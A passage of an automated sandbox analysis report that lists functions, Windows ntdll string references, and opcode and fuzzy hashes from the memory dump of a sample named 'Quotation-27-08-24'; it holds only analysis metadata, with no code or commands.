                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $@
                                          • API String ID: 0-1077428164
                                          • Opcode ID: a5e1c131a1d4c806fc2203076ee0285e0cd392c260bdfd98fc6eb6b844e4fed6
                                          • Instruction ID: 195c8d5e0a46a94956133be6c984aec657fc179dbb9cbbfddf3bbc3f10060f21
                                          • Opcode Fuzzy Hash: a5e1c131a1d4c806fc2203076ee0285e0cd392c260bdfd98fc6eb6b844e4fed6
                                          • Instruction Fuzzy Hash: 41C29072A0C3419FDB25DF24C881BABBBE5AF88754F14892DF989C7241D734D805EB92
                                          Function 00F5A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: FilterFullPath$UseFilter$\??\
                                          • API String ID: 0-2779062949
                                          • Opcode ID: 5c095ab5f54df2610de3c20c3bc043d72ebff6016e299727951ededa8c8b64b9
                                          • Instruction ID: f77da04e3da444264fd941909e2b370eab91f71429facf4a6c4afe0e1b9b6fb8
                                          • Opcode Fuzzy Hash: 5c095ab5f54df2610de3c20c3bc043d72ebff6016e299727951ededa8c8b64b9
                                          • Instruction Fuzzy Hash: 32A17C72D112299BDB31DF64CC89BEAB7B8EF44710F1441EAE908A7250D7399E84DF90
                                          Function 00F80BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                          Download Yara Rule
                                          Strings
                                          • LdrpCheckModule, xrefs: 00FCA117
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00FCA121
                                          • Failed to allocated memory for shimmed module list, xrefs: 00FCA10F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-161242083
                                          • Opcode ID: e23a4a1d483e8dd29162c9f0dbea46e302edabbb8a78944cd6a1df25d22d96e7
                                          • Instruction ID: 53a6fee2921f8225ce928773dee57e656e454cae1c32601f815c84f568ea46bc
                                          • Opcode Fuzzy Hash: e23a4a1d483e8dd29162c9f0dbea46e302edabbb8a78944cd6a1df25d22d96e7
                                          • Instruction Fuzzy Hash: 3771DE71E002099FCB64EF68CD42BBEB7B4FB44714F54412DE842AB241EB39AD45EB51
                                          Function 00F70A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-1334570610
                                          • Opcode ID: 3a2372c71bf70ff1aa38a05774febe4ba2ff824aff519b74608303726f26eff9
                                          • Instruction ID: 8bbac06cde21c8cb93ec75626c0e9e10f7d455659863e38045e50b7527852c6d
                                          • Opcode Fuzzy Hash: 3a2372c71bf70ff1aa38a05774febe4ba2ff824aff519b74608303726f26eff9
                                          • Instruction Fuzzy Hash: 5461B071600342DFDB28CF28C541B6ABBE1FF45714F14855EE889CB282CB74E981EB92
                                          Function 00F5CCC8 Relevance: 3.9, Strings: 3, Instructions: 164COMMON
                                          Download Yara Rule
                                          Strings
                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00F5CD34
                                          • InstallLanguageFallback, xrefs: 00F5CD7F
                                          • @, xrefs: 00F5CD63
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                          • API String ID: 0-1757540487
                                          • Opcode ID: 8c1ac8d8d5a5ea230472e04f839ec83b0dd720a48a5a660424a8b5b3f1836d54
                                          • Instruction ID: 3764fbf1154100917290bc018d5e2dc79b4dc31f65234190384bf5d0afbb0ac5
                                          • Opcode Fuzzy Hash: 8c1ac8d8d5a5ea230472e04f839ec83b0dd720a48a5a660424a8b5b3f1836d54
                                          • Instruction Fuzzy Hash: 5951D3B6904345DBC710DF65C844BABB7F8AF88724F04092EF985D7251E774DD08ABA2
                                          Function 00F9C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                          Download Yara Rule
                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00FD82E8
                                          • Failed to reallocate the system dirs string !, xrefs: 00FD82D7
                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 00FD82DE
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-1783798831
                                          • Opcode ID: ed97814f3cb33a856d41504aa0696d22bfc19c6a28ebaf99b977c9f01e5d872a
                                          • Instruction ID: e542277dd261458b153d12e57637e4a1660b0c05b1783fc4b97d6916b0eeef52
                                          • Opcode Fuzzy Hash: ed97814f3cb33a856d41504aa0696d22bfc19c6a28ebaf99b977c9f01e5d872a
                                          • Instruction Fuzzy Hash: 6741B771944304ABDB30EB64DC45B5B77E8EF48760F44492AF988D7291EB79D800EB92
                                          Function 0101C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                          Download Yara Rule
                                          Strings
                                          • PreferredUILanguages, xrefs: 0101C212
                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0101C1C5
                                          • @, xrefs: 0101C1F1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                          • API String ID: 0-2968386058
                                          • Opcode ID: d6329d00f5df33132740393a0954870f9a84699b5a76c5656a7c1e65c2101ceb
                                          • Instruction ID: aad20698904e2c3a8b5b7017df66fc966416be52946e98979a84e58d8dff3ca2
                                          • Opcode Fuzzy Hash: d6329d00f5df33132740393a0954870f9a84699b5a76c5656a7c1e65c2101ceb
                                          • Instruction Fuzzy Hash: 10418272E40209EBEF51DAD8CD41FEEBBF8AB04700F04406AEA49B7284D778DE449B50
                                          Function 00FF4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                          • API String ID: 0-1373925480
                                          • Opcode ID: f61296ae08122abea480b476d218b52240eef53a4d44e40bc28cd5d0e0ff3e67
                                          • Instruction ID: 5ba590454568013fb9447c623ff6e05807f82f2b07de06e4bcee301358e4d23c
                                          • Opcode Fuzzy Hash: f61296ae08122abea480b476d218b52240eef53a4d44e40bc28cd5d0e0ff3e67
                                          • Instruction Fuzzy Hash: 7541F632D0429C8BDB22DB95CC40BBEB7B4FF45350F24046AEA01EB7A1D738A941EB11
                                          Function 00FE4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                          Download Yara Rule
                                          Strings
                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 00FE4888
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 00FE4899
                                          • LdrpCheckRedirection, xrefs: 00FE488F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-3154609507
                                          • Opcode ID: c6df477114ad95bc4653e9a6be2b26f7792b2ca8124ede25cca6ceb7f6299516
                                          • Instruction ID: cc76760b4c48697926f5c29644b78ba8b8396e50d0777b4aca3d45e90db59919
                                          • Opcode Fuzzy Hash: c6df477114ad95bc4653e9a6be2b26f7792b2ca8124ede25cca6ceb7f6299516
                                          • Instruction Fuzzy Hash: EB419032E047909BCB21CE6AD840A267BE5BF89760F05065DEC9997251D735FD00EBD1
                                          Function 00F70BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-2558761708
                                          • Opcode ID: f29dd1952e5ed39aa2688c2968974d3ffaaaf68cca6406e3b4d132f4fdac1ea8
                                          • Instruction ID: 88b6bca644af96ae95c2be8fabd1de9686ce550b3ee5439a196ed2ba68b909e3
                                          • Opcode Fuzzy Hash: f29dd1952e5ed39aa2688c2968974d3ffaaaf68cca6406e3b4d132f4fdac1ea8
                                          • Instruction Fuzzy Hash: AC119331315542DFD71CD618C852F6AB3A4AF81B26F24816EE409CB251DB34ECC4E752
                                          Function 00FE20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                          Download Yara Rule
                                          Strings
                                          • minkernel\ntdll\ldrinit.c, xrefs: 00FE2104
                                          • LdrpInitializationFailure, xrefs: 00FE20FA
                                          • Process initialization failed with status 0x%08lx, xrefs: 00FE20F3
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2986994758
                                          • Opcode ID: 6c02abf5d7fae5f49f6ded7a7082a03e46c4d60d636cbda9b80a362e52221351
                                          • Instruction ID: ae64405c7b5cfb01e96c12124c86e52088b48f4015a4ae00aac26290b20d849e
                                          • Opcode Fuzzy Hash: 6c02abf5d7fae5f49f6ded7a7082a03e46c4d60d636cbda9b80a362e52221351
                                          • Instruction Fuzzy Hash: 1AF0C871A4034C7BE724E649CC43F9A3B6CFB41B54F500066FA406B282D6F8AA40EA51
                                          Function 00F703E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: #%u
                                          • API String ID: 48624451-232158463
                                          • Opcode ID: 1b66f9dbef81844dedf044a324e4b93f03ddcf58421dc81b2e620beb606d3afd
                                          • Instruction ID: be7f95818d1767f57d73466218e6e7d0d244d5fccd6eaf0ffc1a5f3ca6a14b20
                                          • Opcode Fuzzy Hash: 1b66f9dbef81844dedf044a324e4b93f03ddcf58421dc81b2e620beb606d3afd
                                          • Instruction Fuzzy Hash: DA715C72A0014A9FDB01DF98C991FAEB7B8EF08714F144069E905E7251EB38EE41DB61
                                          Function 00F6A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                          Download Yara Rule
                                          Strings
                                          • LdrResSearchResource Enter, xrefs: 00F6AA13
                                          • LdrResSearchResource Exit, xrefs: 00F6AA25
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                          • API String ID: 0-4066393604
                                          • Opcode ID: cc375e6f28ec9710b7b7008728103a84ce7d0054e0a39069ee4918ba44bcaad8
                                          • Instruction ID: 2f85bbcbce02b8de171a6de97c164d9f743003d86a3c76be4dcb9c05dcefcbf1
                                          • Opcode Fuzzy Hash: cc375e6f28ec9710b7b7008728103a84ce7d0054e0a39069ee4918ba44bcaad8
                                          • Instruction Fuzzy Hash: 83E17F72E00219EFDB219E99CA81BAEB7B9FF44364F14402AE901E7251D7789D40FF52
                                          Function 0102A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: `$`
                                          • API String ID: 0-197956300
                                          • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                          • Instruction ID: b47132bcc6a5d88cea9777ad00ba3dbbb19dd740be35bc8242dd2f4c2947e4f0
                                          • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                          • Instruction Fuzzy Hash: 49C1CD31304352DBEB24CE28C845B6BBBE5AFC8318F088A6DF6D68B691DB74D505CB41
                                          Function 00FDE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Legacy$UEFI
                                          • API String ID: 2994545307-634100481
                                          • Opcode ID: 6e7f9a13e8bd3ac169b1959f70f0a9071240ebd4a09a425429e0a4bd3e53c5c5
                                          • Instruction ID: 510f5d3883c251eacd90100ac61ad1954304e8679f389f0ac588f0b3b20ded30
                                          • Opcode Fuzzy Hash: 6e7f9a13e8bd3ac169b1959f70f0a9071240ebd4a09a425429e0a4bd3e53c5c5
                                          • Instruction Fuzzy Hash: 72615D72E006189FDB14EFA8C841BADBBB6FB44700F24406EE559EB391D731AD40EB50
                                          Function 010043D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$MUI
                                          • API String ID: 0-17815947
                                          • Opcode ID: a385e193909df7f1189a90a935cc103fce5c95cc299e168d5d3dff8474675a0b
                                          • Instruction ID: d9a8bcad32dcdd8811fc0338636d3322f342727af63f86dfe487e16652d7dc63
                                          • Opcode Fuzzy Hash: a385e193909df7f1189a90a935cc103fce5c95cc299e168d5d3dff8474675a0b
                                          • Instruction Fuzzy Hash: E3513AB1E0021DAFEB11DFA9CC81AEEBBB8EB44754F100529E651F7281D735AD05DB60
                                          Function 00F604E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                          Download Yara Rule
                                          Strings
                                          • kLsE, xrefs: 00F60540
                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00F6063D
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                          • API String ID: 0-2547482624
                                          • Opcode ID: 9745cba96141829cbc66135b70eee7223e32ee8597ad2c1c2a988fcf2ce56c58
                                          • Instruction ID: 201ea46e5a9ed5e8bdff641a4efa698ca33a2229899ff193c8300fa60c54b2f3
                                          • Opcode Fuzzy Hash: 9745cba96141829cbc66135b70eee7223e32ee8597ad2c1c2a988fcf2ce56c58
                                          • Instruction Fuzzy Hash: 9A51F271A047468FC724EF24C4406A7B7E4AF84324F24483EE9DA87281EB75E945DFA2
                                          Function 00F6A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                          Download Yara Rule
                                          Strings
                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 00F6A2FB
                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 00F6A309
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                          • API String ID: 0-2876891731
                                          • Opcode ID: 5151f0dd3d9db9d37c92737c2f5b58c51b74291f544a962b40cf0d7a573f61af
                                          • Instruction ID: 6fdc02f3a0c97fa4b33c8e95d80257f43b4e9cd63556d359af932273f3616e0f
                                          • Opcode Fuzzy Hash: 5151f0dd3d9db9d37c92737c2f5b58c51b74291f544a962b40cf0d7a573f61af
                                          • Instruction Fuzzy Hash: 0941AD31A04649DBDB21CF59C942B6A77B4FF85720F2440A9E904EB391E376DE40EB52
                                          Function 00F9A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: Cleanup Group$Threadpool!
                                          • API String ID: 2994545307-4008356553
                                          • Opcode ID: 486f2be800b12e56f1eaa2af42ddc5c8a8c17186a124cb1fc607ef465cf616f4
                                          • Instruction ID: 9950356a3cdeeed2b6fa828d2aa03efe44412a48e661dbab978be608d9aecaca
                                          • Opcode Fuzzy Hash: 486f2be800b12e56f1eaa2af42ddc5c8a8c17186a124cb1fc607ef465cf616f4
                                          • Instruction Fuzzy Hash: 4801D1B2240704AFE711DF14CD46B1677E8E784B26F058939B548C7190E738D804EB96
                                          Function 00F6C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: MUI
                                          • API String ID: 0-1339004836
                                          • Opcode ID: cb57717c3922391e7dce3d66960a88f4c311a08b880645d2f715708d1de42991
                                          • Instruction ID: dadbdaa7395f3bb825cac5222edcbf7a17f267bf121ba6d401a62a5a8da82d65
                                          • Opcode Fuzzy Hash: cb57717c3922391e7dce3d66960a88f4c311a08b880645d2f715708d1de42991
                                          • Instruction Fuzzy Hash: F0826D75E002589FDB24CFA9C880BADB7B1FF49310F248169E899AB351DB349D41EF90
                                          Function 00FE6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: c2abfdfa674026e7c5ea45fc0bbacfe7365919e279073cffcb8b5e497c440846
                                          • Instruction ID: 746347a6b1551e0e39b08d8b6ff8293013c91d454e31db7c0b5a3356adb35418
                                          • Opcode Fuzzy Hash: c2abfdfa674026e7c5ea45fc0bbacfe7365919e279073cffcb8b5e497c440846
                                          • Instruction Fuzzy Hash: 8E9161B2A40259AFDB21DB95CD85FEEB7B8EF18B50F144065F600EB191D774AD00EBA0
                                          Function 0100E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: 2f6e165dc3fb2ceacab3a6b4057b870f733c689e6c773ceb278bb52751d57858
                                          • Instruction ID: 3b2878e26d4e761fec3b0c29a2f826c2f798a4c556c7ac01078368f24a9f0be0
                                          • Opcode Fuzzy Hash: 2f6e165dc3fb2ceacab3a6b4057b870f733c689e6c773ceb278bb52751d57858
                                          • Instruction Fuzzy Hash: 8491CE72901608BEEB23ABA4DC44FEFBBB9EF85740F104429F544B7291DB789901DB91
                                          Function 00F9A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: GlobalTags
                                          • API String ID: 0-1106856819
                                          • Opcode ID: ca6569ac104ea4941e9812f262e7a0060de5049ffb4948dff95b1698b78a68ef
                                          • Instruction ID: 67d4c8fb4003b746af13e00c100eafc68be0c45dd16d1be789c48f81386711c2
                                          • Opcode Fuzzy Hash: ca6569ac104ea4941e9812f262e7a0060de5049ffb4948dff95b1698b78a68ef
                                          • Instruction Fuzzy Hash: EF716C75E0020A9FDF28DF98C5906ADBBB2BF58714F28812AE805E7340DB359D41EB60
                                          Function 01004978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .mui
                                          • API String ID: 0-1199573805
                                          • Opcode ID: b9c86163012d763a1a7ae533aa2b5071848f2481411facd181f69454a99039dd
                                          • Instruction ID: 2a9b6ad7be15bc2dd3da30dbc0f267668cad2aacfa4c1c8f53ac4b4274ad8f28
                                          • Opcode Fuzzy Hash: b9c86163012d763a1a7ae533aa2b5071848f2481411facd181f69454a99039dd
                                          • Instruction Fuzzy Hash: 8451DB72D006259BEF11DF99D840AAEBBB4BF09B10F054169FB51F7291D3749D01CBA8
                                          Function 00F7E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: EXT-
                                          • API String ID: 0-1948896318
                                          • Opcode ID: 3ee979f4e4eabd39c832daf02e87e7b34fbd7bfd7648f5cb5fcc879708ad4a13
                                          • Instruction ID: 22f7e904f2a08340cc4f43d18097576c7e16869ab89e078ed19692f6e3dea5e0
                                          • Opcode Fuzzy Hash: 3ee979f4e4eabd39c832daf02e87e7b34fbd7bfd7648f5cb5fcc879708ad4a13
                                          • Instruction Fuzzy Hash: 4A41A1729083019BD714DA74CC41B6BB7E8AF8CB14F44896FF998D7180E678D909A793
                                          Function 00FDC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          • Opcode ID: e33abf95a2c2b2b181cd20527c2f7961804e0a80729a3fc030a1255ecbe922b9
                                          • Instruction ID: befd333b97f9a26b5f2e7f88a18cea07ed6e5cdaf7d053534ce25c34df4598e6
                                          • Opcode Fuzzy Hash: e33abf95a2c2b2b181cd20527c2f7961804e0a80729a3fc030a1255ecbe922b9
                                          • Instruction Fuzzy Hash: 054194F1D0012DABDB21DA60CC81FDEB77DAB45714F0445A6EA08AB241DB749E88DFE4
                                          Function 00FF6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #
                                          • API String ID: 0-1885708031
                                          • Opcode ID: 15de0f61a48937624a3cffa5f5baf6983bb21b463427f92f2afeaa0ba752e1d0
                                          • Instruction ID: c9cf545c31bb8e08a63a8ec397bf3e9493b910546ea4983ac10d88af1f933b84
                                          • Opcode Fuzzy Hash: 15de0f61a48937624a3cffa5f5baf6983bb21b463427f92f2afeaa0ba752e1d0
                                          • Instruction Fuzzy Hash: 92310531A0071C9ADB21DB68CC50BBE77A8DF45715F104029EAC1EB292CFA9ED05EB50
                                          Function 00FDCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryName
                                          • API String ID: 0-215506332
                                          • Opcode ID: 940ccbe0eff4572cb64ab490e5fd8abcdd9a99e9e2e7b6913818748bb53cc8c7
                                          • Instruction ID: ee97ccc5d609747e51729cbfbf92dd4b12d922a2b6bfba14efaf0e3453cc7913
                                          • Opcode Fuzzy Hash: 940ccbe0eff4572cb64ab490e5fd8abcdd9a99e9e2e7b6913818748bb53cc8c7
                                          • Instruction Fuzzy Hash: 56310376D0051AAFEB16DA58C852E6FB776EBC0760F15412BE805A7391D730DE00EBE0
                                          Function 00F88CB1 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
